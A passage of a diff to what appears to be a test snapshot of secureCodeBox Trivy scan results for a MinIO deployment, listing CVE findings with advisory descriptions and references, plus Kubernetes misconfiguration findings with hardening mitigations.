"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44716", + "value": "https://github.com/advisories/GHSA-ch7v-37xg-75ph", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-vc3p-29h2-gpcp", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-2835", }, { "type": "URL", - "value": "https://github.com/golang/go/commit/48d948963c5ce7add72af5665a871caff6c1d35a (go1.17.5)", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-2835", + }, + ], + "severity": "MEDIUM", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'opt/bitnami/minio/bin/minio' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2022-2837", + "installedVersion": "v1.9.3", + "packageName": "github.com/coredns/coredns", + "references": [ + "https://access.redhat.com/security/cve/CVE-2022-2837", + "https://bugzilla.redhat.com/show_bug.cgi?id=2118543", + "https://github.com/advisories/GHSA-h828-v5pv-33qx", + "https://nvd.nist.gov/vuln/detail/CVE-2022-2837", + "https://www.cve.org/CVERecord?id=CVE-2022-2837", + ], + }, + "category": "Vulnerability", + "description": "A flaw was found in coreDNS. This flaw allows a malicious user to redirect traffic intended for external top-level domains (TLD) to a pod they control by creating projects and namespaces that match the TLD.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": undefined, + "name": "DNS Redirection of Top-Level Domains", + "references": [ + { + "type": "URL", + "value": "https://avd.aquasec.com/nvd/cve-2022-2837", }, { "type": "URL", - "value": "https://github.com/golang/go/issues/50058", + "value": "https://access.redhat.com/security/cve/CVE-2022-2837", }, { "type": "URL", - "value": "https://github.com/golang/net/commit/491a49abca63de5e07ef554052d180a1b5fe2d70", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2118543", }, { "type": "URL", - "value": "https://go.dev/cl/369794", + "value": "https://github.com/advisories/GHSA-h828-v5pv-33qx", }, { "type": "URL", - "value": "https://go.dev/issue/50058", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-2837", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/hcmEScgc00k", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-2837", }, + ], + "severity": "MEDIUM", + }, + { + "attributes": { + "fixedVersion": "1.2.26", + "foundIn": "Target: 'opt/bitnami/minio/bin/minio' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "GHSA-rm8v-mxj3-5rmq", + "installedVersion": "v1.2.19", + "packageName": "github.com/lestrrat-go/jwx", + "references": [ + "https://github.com/advisories/GHSA-rm8v-mxj3-5rmq", + "https://github.com/lestrrat-go/jwx/blob/796b2a9101cf7e7cb66455e4d97f3c158ee10904/jwe/internal/aescbc/aescbc.go#L33-L66", + "https://github.com/lestrrat-go/jwx/blob/8840ffd4afc5839f591ff0e9ba9034af52b1643e/jwe/internal/aescbc/aescbc.go#L210-L213", + "https://github.com/lestrrat-go/jwx/commit/6c41e3822485fc7e11dd70b4b0524b075d66b103", + "https://github.com/lestrrat-go/jwx/commit/d9ddbc8e5009cfdd8c28413390b67afa7f576dd6", + "https://github.com/lestrrat-go/jwx/security/advisories/GHSA-rm8v-mxj3-5rmq", + ], + }, + "category": "Vulnerability", + "description": "AES-CBC decryption is vulnerable to a timing attack which may permit an attacker to recover the plaintext of JWE data.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": undefined, + "name": "github.com/lestrrat-go/jwx vulnerable to Potential Padding Oracle Attack", + "references": [ { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/hcmEScgc00k/m/ZWnOjeY4CQAJ", + "value": "https://github.com/advisories/GHSA-rm8v-mxj3-5rmq", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2021-44716.html", + "value": "https://github.com/lestrrat-go/jwx/blob/796b2a9101cf7e7cb66455e4d97f3c158ee10904/jwe/internal/aescbc/aescbc.go#L33-L66", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2022-0001.html", + "value": "https://github.com/lestrrat-go/jwx/blob/8840ffd4afc5839f591ff0e9ba9034af52b1643e/jwe/internal/aescbc/aescbc.go#L210-L213", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/01/msg00016.html", + "value": "https://github.com/lestrrat-go/jwx/commit/6c41e3822485fc7e11dd70b4b0524b075d66b103", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/01/msg00017.html", + "value": "https://github.com/lestrrat-go/jwx/commit/d9ddbc8e5009cfdd8c28413390b67afa7f576dd6", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2023/04/msg00021.html", + "value": "https://github.com/lestrrat-go/jwx/security/advisories/GHSA-rm8v-mxj3-5rmq", }, + ], + "severity": "MEDIUM", + }, + { + "attributes": { + "fixedVersion": "0.28.0", + "foundIn": "Target: 'opt/bitnami/minio/bin/minio' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2023-33955", + "installedVersion": "v0.20.0", + "packageName": "github.com/minio/console", + "references": [ + "https://github.com/advisories/GHSA-jv3f-7m33-qp65", + "https://github.com/minio/console/commit/17e791afb90c9ad27c65f63c6be14f2f6a3a9d60", + "https://github.com/minio/console/releases/tag/v0.28.0", + "https://github.com/minio/console/security/advisories/GHSA-jv3f-7m33-qp65", + "https://nvd.nist.gov/vuln/detail/CVE-2023-33955", + ], + }, + "category": "Vulnerability", + "description": +"Minio Console is the UI for MinIO Object Storage. Unicode RIGHT-TO-LEFT OVERRIDE characters can be used to mask the original filename. This issue has been patched in version 0.28.0. + +" +, + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": undefined, + "name": "Minio console object names with RIGHT-TO-LEFT OVERRIDE unicode character can be exploited", + "references": [ { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-44716", + "value": "https://avd.aquasec.com/nvd/cve-2023-33955", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2022-0288", + "value": "https://github.com/advisories/GHSA-jv3f-7m33-qp65", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202208-02", + "value": "https://github.com/minio/console/commit/17e791afb90c9ad27c65f63c6be14f2f6a3a9d60", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20220121-0002/", + "value": "https://github.com/minio/console/releases/tag/v0.28.0", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-44716", + "value": "https://github.com/minio/console/security/advisories/GHSA-jv3f-7m33-qp65", + }, + { + "type": "URL", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-33955", }, ], - "severity": "HIGH", + "severity": "MEDIUM", }, { "attributes": { "fixedVersion": "0.0.0-20220906165146-f3363e06e74c", - "foundIn": "Target: 'usr/local/bin/etcdctl' / Class: 'lang-pkgs' / Type: 'gobinary'", + "foundIn": "Target: 'opt/bitnami/minio/bin/minio' / Class: 'lang-pkgs' / Type: 'gobinary'", "id": "CVE-2022-27664", - "installedVersion": "v0.0.0-20211112202133-69e39bad7dc2", + "installedVersion": "v0.0.0-20220722155237-a158d28d115b", "packageName": "golang.org/x/net", "references": [ "https://access.redhat.com/errata/RHSA-2023:2357", @@ -74132,7 +75369,7 @@ commonly used by applications.", }, "category": "Vulnerability", "description": "In net/http in Go before 1.18.6 and 1.19.x before 1.19.1, attackers can cause a denial of service because an HTTP/2 connection can hang during closing if shutdown were preempted by a fatal error.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, "name": "handle server errors after sending GOAWAY", "references": [ @@ -74347,15 +75584,79 @@ commonly used by applications.", ], "severity": "HIGH", }, + { + "attributes": { + "fixedVersion": "0.1.1-0.20221104162952-702349b0e862", + "foundIn": "Target: 'opt/bitnami/minio/bin/minio' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2022-41721", + "installedVersion": "v0.0.0-20220722155237-a158d28d115b", + "packageName": "golang.org/x/net", + "references": [ + "https://access.redhat.com/security/cve/CVE-2022-41721", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41721", + "https://github.com/advisories/GHSA-fxg5-wq6x-vr4w", + "https://go.dev/cl/447396", + "https://go.dev/issue/56352", + "https://nvd.nist.gov/vuln/detail/CVE-2022-41721", + "https://pkg.go.dev/vuln/GO-2023-1495", + "https://www.cve.org/CVERecord?id=CVE-2022-41721", + ], + }, + "category": "Vulnerability", + "description": "A request smuggling attack is possible when using MaxBytesHandler. When using MaxBytesHandler, the body of an HTTP request is not fully consumed. When the server attempts to read HTTP2 frames from the connection, it will instead be reading the body of the HTTP request, which could be attacker-manipulated to represent arbitrary HTTP2 requests.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": undefined, + "name": "request smuggling", + "references": [ + { + "type": "URL", + "value": "https://avd.aquasec.com/nvd/cve-2022-41721", + }, + { + "type": "URL", + "value": "https://access.redhat.com/security/cve/CVE-2022-41721", + }, + { + "type": "URL", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41721", + }, + { + "type": "URL", + "value": "https://github.com/advisories/GHSA-fxg5-wq6x-vr4w", + }, + { + "type": "URL", + "value": "https://go.dev/cl/447396", + }, + { + "type": "URL", + "value": "https://go.dev/issue/56352", + }, + { + "type": "URL", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-41721", + }, + { + "type": "URL", + "value": "https://pkg.go.dev/vuln/GO-2023-1495", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-41721", + }, + ], + "severity": "HIGH", + }, { "attributes": { "fixedVersion": "0.7.0", - "foundIn": "Target: 'usr/local/bin/etcdctl' / Class: 'lang-pkgs' / Type: 'gobinary'", + "foundIn": "Target: 'opt/bitnami/minio/bin/minio' / Class: 'lang-pkgs' / Type: 'gobinary'", "id": "CVE-2022-41723", - "installedVersion": "v0.0.0-20211112202133-69e39bad7dc2", + "installedVersion": "v0.0.0-20220722155237-a158d28d115b", "packageName": "golang.org/x/net", "references": [ "https://access.redhat.com/security/cve/CVE-2022-41723", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41723", "https://github.com/advisories/GHSA-vvpx-j8f3-3w6h", "https://go.dev/cl/468135", "https://go.dev/cl/468295", @@ -74373,7 +75674,7 @@ commonly used by applications.", }, "category": "Vulnerability", "description": "A maliciously crafted HTTP/2 stream could cause excessive CPU consumption in the HPACK decoder, sufficient to cause a denial of service from a small number of small requests.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, "name": "avoid quadratic complexity in HPACK decoding", "references": [ @@ -74385,6 +75686,10 @@ commonly used by applications.", "type": "URL", "value": "https://access.redhat.com/security/cve/CVE-2022-41723", }, + { + "type": "URL", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41723", + }, { "type": "URL", "value": "https://github.com/advisories/GHSA-vvpx-j8f3-3w6h", @@ -74443,9 +75748,9 @@ commonly used by applications.", { "attributes": { "fixedVersion": "0.4.0", - "foundIn": "Target: 'usr/local/bin/etcdctl' / Class: 'lang-pkgs' / Type: 'gobinary'", + "foundIn": "Target: 'opt/bitnami/minio/bin/minio' / Class: 'lang-pkgs' / Type: 'gobinary'", "id": "CVE-2022-41717", - "installedVersion": "v0.0.0-20211112202133-69e39bad7dc2", + "installedVersion": "v0.0.0-20220722155237-a158d28d115b", "packageName": "golang.org/x/net", "references": [ "https://access.redhat.com/errata/RHSA-2023:2367", @@ -74472,7 +75777,7 @@ commonly used by applications.", }, "category": "Vulnerability", "description": "An attacker can cause excessive memory growth in a Go server accepting HTTP/2 requests. HTTP/2 server connections contain a cache of HTTP header keys sent by the client. While the total number of entries in this cache is capped, an attacker sending very large keys can cause the server to allocate approximately 64 MiB per open connection.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, "name": "excessive memory growth in a Go server accepting HTTP/2 requests", "references": [ @@ -74565,1665 +75870,2323 @@ commonly used by applications.", }, { "attributes": { - "fixedVersion": "0.0.0-20220412211240-33da011f77ad", - "foundIn": "Target: 'usr/local/bin/etcdctl' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2022-29526", - "installedVersion": "v0.0.0-20210615035016-665e8c7367d1", - "packageName": "golang.org/x/sys", + "fixedVersion": "0.3.8", + "foundIn": "Target: 'opt/bitnami/minio/bin/minio' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2022-32149", + "installedVersion": "v0.3.7", + "packageName": "golang.org/x/text", "references": [ - "https://access.redhat.com/security/cve/CVE-2022-29526", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29526", - "https://github.com/advisories/GHSA-p782-xgp4-8hr8", - "https://github.com/golang/go/commit/f66925e854e71e0c54b581885380a490d7afa30c", - "https://github.com/golang/go/issues/52313", - "https://go.dev/cl/399539", - "https://go.dev/cl/400074", - "https://go.dev/issue/52313", - "https://groups.google.com/g/golang-announce", - "https://groups.google.com/g/golang-announce/c/Y5qrqw_lWdU", - "https://linux.oracle.com/cve/CVE-2022-29526.html", - "https://linux.oracle.com/errata/ELSA-2022-5337.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Q6GE5EQGE4L2KRVGW4T75QVIYAXCLO5X/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RQXU752ALW53OJAF5MG3WMR5CCZVLWW6/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Z55VUVGO7E5PJFXIOVAY373NZRHBNCI5/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZY2SLWOQR4ZURQ7UBRZ7JIX6H6F5JHJR/", - "https://nvd.nist.gov/vuln/detail/CVE-2022-29526", - "https://pkg.go.dev/vuln/GO-2022-0493", - "https://security.gentoo.org/glsa/202208-02", - "https://security.netapp.com/advisory/ntap-20220729-0001/", - "https://ubuntu.com/security/notices/USN-6038-1", - "https://www.cve.org/CVERecord?id=CVE-2022-29526", + "https://access.redhat.com/security/cve/CVE-2022-32149", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32149", + "https://github.com/advisories/GHSA-69ch-w2m2-3vjp", + "https://github.com/golang/go/issues/56152", + "https://github.com/golang/text/commit/434eadcdbc3b0256971992e8c70027278364c72c", + "https://github.com/golang/text/commit/434eadcdbc3b0256971992e8c70027278364c72c (v0.3.8)", + "https://go.dev/cl/442235", + "https://go.dev/issue/56152", + "https://groups.google.com/g/golang-announce/c/-hjNw559_tE/m/KlGTfid5CAAJ", + "https://groups.google.com/g/golang-dev/c/qfPIly0X7aU", + "https://nvd.nist.gov/vuln/detail/CVE-2022-32149", + "https://pkg.go.dev/vuln/GO-2022-1059", + "https://ubuntu.com/security/notices/USN-5873-1", + "https://www.cve.org/CVERecord?id=CVE-2022-32149", ], }, "category": "Vulnerability", - "description": "Go before 1.17.10 and 1.18.x before 1.18.2 has Incorrect Privilege Assignment. When called with a non-zero flags parameter, the Faccessat function could incorrectly report that a file is accessible.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", + "description": "An attacker may cause a denial of service by crafting an Accept-Language header which ParseAcceptLanguage will take significant time to parse.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "faccessat checks wrong group", + "name": "ParseAcceptLanguage takes a long time to parse complex tags", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-29526", + "value": "https://avd.aquasec.com/nvd/cve-2022-32149", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-29526", + "value": "https://access.redhat.com/security/cve/CVE-2022-32149", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29526", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32149", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-p782-xgp4-8hr8", + "value": "https://github.com/advisories/GHSA-69ch-w2m2-3vjp", }, { "type": "URL", - "value": "https://github.com/golang/go/commit/f66925e854e71e0c54b581885380a490d7afa30c", + "value": "https://github.com/golang/go/issues/56152", }, { "type": "URL", - "value": "https://github.com/golang/go/issues/52313", + "value": "https://github.com/golang/text/commit/434eadcdbc3b0256971992e8c70027278364c72c", }, { "type": "URL", - "value": "https://go.dev/cl/399539", + "value": "https://github.com/golang/text/commit/434eadcdbc3b0256971992e8c70027278364c72c (v0.3.8)", }, { "type": "URL", - "value": "https://go.dev/cl/400074", + "value": "https://go.dev/cl/442235", }, { "type": "URL", - "value": "https://go.dev/issue/52313", + "value": "https://go.dev/issue/56152", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce", + "value": "https://groups.google.com/g/golang-announce/c/-hjNw559_tE/m/KlGTfid5CAAJ", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/Y5qrqw_lWdU", + "value": "https://groups.google.com/g/golang-dev/c/qfPIly0X7aU", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-29526.html", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-32149", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2022-5337.html", + "value": "https://pkg.go.dev/vuln/GO-2022-1059", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Q6GE5EQGE4L2KRVGW4T75QVIYAXCLO5X/", + "value": "https://ubuntu.com/security/notices/USN-5873-1", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RQXU752ALW53OJAF5MG3WMR5CCZVLWW6/", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-32149", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Deployment/securecodebox-operator-minio' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV001", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "https://avd.aquasec.com/misconfig/ksv001", + ], + }, + "category": "Misconfiguration", + "description": "A program inside the container can elevate its own privileges and run as root, which might give the program control over the container and node.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": "Set 'set containers[].securityContext.allowPrivilegeEscalation' to 'false'.", + "name": "Process can elevate its own privileges(Container 'minio' of Deployment 'securecodebox-operator-minio' should set 'securityContext.allowPrivilegeEscalation' to false)", + "references": [ { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Z55VUVGO7E5PJFXIOVAY373NZRHBNCI5/", + "value": "https://avd.aquasec.com/misconfig/ksv001", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZY2SLWOQR4ZURQ7UBRZ7JIX6H6F5JHJR/", + "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", }, + ], + "severity": "MEDIUM", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Deployment/securecodebox-operator-minio' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV003", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubesec.io/basics/containers-securitycontext-capabilities-drop-index-all/", + "https://avd.aquasec.com/misconfig/ksv003", + ], + }, + "category": "Misconfiguration", + "description": "The container should drop all default capabilities and add only those that are needed for its execution.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": "Add 'ALL' to containers[].securityContext.capabilities.drop.", + "name": "Default capabilities not dropped(Container 'minio' of Deployment 'securecodebox-operator-minio' should add 'ALL' to 'securityContext.capabilities.drop')", + "references": [ { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-29526", + "value": "https://avd.aquasec.com/misconfig/ksv003", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2022-0493", + "value": "https://kubesec.io/basics/containers-securitycontext-capabilities-drop-index-all/", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Deployment/securecodebox-operator-minio' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV011", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://cloud.google.com/blog/products/containers-kubernetes/kubernetes-best-practices-resource-requests-and-limits", + "https://avd.aquasec.com/misconfig/ksv011", + ], + }, + "category": "Misconfiguration", + "description": "Enforcing CPU limits prevents DoS via resource exhaustion.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": "Set a limit value under 'containers[].resources.limits.cpu'.", + "name": "CPU not limited(Container 'minio' of Deployment 'securecodebox-operator-minio' should set 'resources.limits.cpu')", + "references": [ { "type": "URL", - "value": "https://security.gentoo.org/glsa/202208-02", + "value": "https://avd.aquasec.com/misconfig/ksv011", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20220729-0001/", + "value": "https://cloud.google.com/blog/products/containers-kubernetes/kubernetes-best-practices-resource-requests-and-limits", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Deployment/securecodebox-operator-minio' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV014", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubesec.io/basics/containers-securitycontext-readonlyrootfilesystem-true/", + "https://avd.aquasec.com/misconfig/ksv014", + ], + }, + "category": "Misconfiguration", + "description": "An immutable root file system prevents applications from writing to their local disk. This can limit intrusions, as attackers will not be able to tamper with the file system or write foreign executables to disk.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": "Change 'containers[].securityContext.readOnlyRootFilesystem' to 'true'.", + "name": "Root file system is not read-only(Container 'minio' of Deployment 'securecodebox-operator-minio' should set 'securityContext.readOnlyRootFilesystem' to true)", + "references": [ { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-6038-1", + "value": "https://avd.aquasec.com/misconfig/ksv014", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-29526", + "value": "https://kubesec.io/basics/containers-securitycontext-readonlyrootfilesystem-true/", }, ], - "severity": "MEDIUM", + "severity": "LOW", }, { "attributes": { - "fixedVersion": "0.3.7", - "foundIn": "Target: 'usr/local/bin/etcdctl' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2021-38561", - "installedVersion": "v0.3.6", - "packageName": "golang.org/x/text", + "fixedVersion": undefined, + "foundIn": "Target: 'Deployment/securecodebox-operator-minio' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV015", + "installedVersion": undefined, + "packageName": undefined, "references": [ - "https://access.redhat.com/security/cve/CVE-2021-38561", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-38561", - "https://deps.dev/advisory/OSV/GO-2021-0113", - "https://github.com/advisories/GHSA-ppp9-7jff-5vj2", - "https://go.dev/cl/340830", - "https://go.googlesource.com/text/+/383b2e75a7a4198c42f8f87833eefb772868a56f", - "https://groups.google.com/g/golang-announce", - "https://nvd.nist.gov/vuln/detail/CVE-2021-38561", - "https://pkg.go.dev/golang.org/x/text/language", - "https://pkg.go.dev/vuln/GO-2021-0113", - "https://ubuntu.com/security/notices/USN-5873-1", - "https://www.cve.org/CVERecord?id=CVE-2021-38561", + "https://cloud.google.com/blog/products/containers-kubernetes/kubernetes-best-practices-resource-requests-and-limits", + "https://avd.aquasec.com/misconfig/ksv015", ], }, - "category": "Vulnerability", - "description": "golang.org/x/text/language in golang.org/x/text before 0.3.7 can panic with an out-of-bounds read during BCP 47 language tag parsing. Index calculation is mishandled. If parsing untrusted user input, this can be used as a vector for a denial-of-service attack.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", - "mitigation": undefined, - "name": "out-of-bounds read in golang.org/x/text/language leads to DoS", + "category": "Misconfiguration", + "description": "When containers have resource requests specified, the scheduler can make better decisions about which nodes to place pods on, and how to deal with resource contention.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": "Set 'containers[].resources.requests.cpu'.", + "name": "CPU requests not specified(Container 'minio' of Deployment 'securecodebox-operator-minio' should set 'resources.requests.cpu')", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-38561", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-38561", - }, - { - "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-38561", - }, - { - "type": "URL", - "value": "https://deps.dev/advisory/OSV/GO-2021-0113", - }, - { - "type": "URL", - "value": "https://github.com/advisories/GHSA-ppp9-7jff-5vj2", - }, - { - "type": "URL", - "value": "https://go.dev/cl/340830", - }, - { - "type": "URL", - "value": "https://go.googlesource.com/text/+/383b2e75a7a4198c42f8f87833eefb772868a56f", - }, - { - "type": "URL", - "value": "https://groups.google.com/g/golang-announce", + "value": "https://avd.aquasec.com/misconfig/ksv015", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-38561", + "value": "https://cloud.google.com/blog/products/containers-kubernetes/kubernetes-best-practices-resource-requests-and-limits", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Deployment/securecodebox-operator-minio' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV018", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubesec.io/basics/containers-resources-limits-memory/", + "https://avd.aquasec.com/misconfig/ksv018", + ], + }, + "category": "Misconfiguration", + "description": "Enforcing memory limits prevents DoS via resource exhaustion.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": "Set a limit value under 'containers[].resources.limits.memory'.", + "name": "Memory not limited(Container 'minio' of Deployment 'securecodebox-operator-minio' should set 'resources.limits.memory')", + "references": [ { "type": "URL", - "value": "https://pkg.go.dev/golang.org/x/text/language", + "value": "https://avd.aquasec.com/misconfig/ksv018", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2021-0113", + "value": "https://kubesec.io/basics/containers-resources-limits-memory/", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Deployment/securecodebox-operator-minio' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV020", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubesec.io/basics/containers-securitycontext-runasuser/", + "https://avd.aquasec.com/misconfig/ksv020", + ], + }, + "category": "Misconfiguration", + "description": "Force the container to run with user ID > 10000 to avoid conflicts with the host’s user table.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": "Set 'containers[].securityContext.runAsUser' to an integer > 10000.", + "name": "Runs with low user ID(Container 'minio' of Deployment 'securecodebox-operator-minio' should set 'securityContext.runAsUser' > 10000)", + "references": [ { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5873-1", + "value": "https://avd.aquasec.com/misconfig/ksv020", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-38561", + "value": "https://kubesec.io/basics/containers-securitycontext-runasuser/", }, ], - "severity": "HIGH", + "severity": "LOW", }, { "attributes": { - "fixedVersion": "0.3.8", - "foundIn": "Target: 'usr/local/bin/etcdctl' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2022-32149", - "installedVersion": "v0.3.6", - "packageName": "golang.org/x/text", + "fixedVersion": undefined, + "foundIn": "Target: 'Deployment/securecodebox-operator-minio' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV021", + "installedVersion": undefined, + "packageName": undefined, "references": [ - "https://access.redhat.com/security/cve/CVE-2022-32149", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32149", - "https://github.com/advisories/GHSA-69ch-w2m2-3vjp", - "https://github.com/golang/go/issues/56152", - "https://github.com/golang/text/commit/434eadcdbc3b0256971992e8c70027278364c72c", - "https://github.com/golang/text/commit/434eadcdbc3b0256971992e8c70027278364c72c (v0.3.8)", - "https://go.dev/cl/442235", - "https://go.dev/issue/56152", - "https://groups.google.com/g/golang-announce/c/-hjNw559_tE/m/KlGTfid5CAAJ", - "https://groups.google.com/g/golang-dev/c/qfPIly0X7aU", - "https://nvd.nist.gov/vuln/detail/CVE-2022-32149", - "https://pkg.go.dev/vuln/GO-2022-1059", - "https://ubuntu.com/security/notices/USN-5873-1", - "https://www.cve.org/CVERecord?id=CVE-2022-32149", + "https://kubesec.io/basics/containers-securitycontext-runasuser/", + "https://avd.aquasec.com/misconfig/ksv021", ], }, - "category": "Vulnerability", - "description": "An attacker may cause a denial of service by crafting an Accept-Language header which ParseAcceptLanguage will take significant time to parse.", - "location": 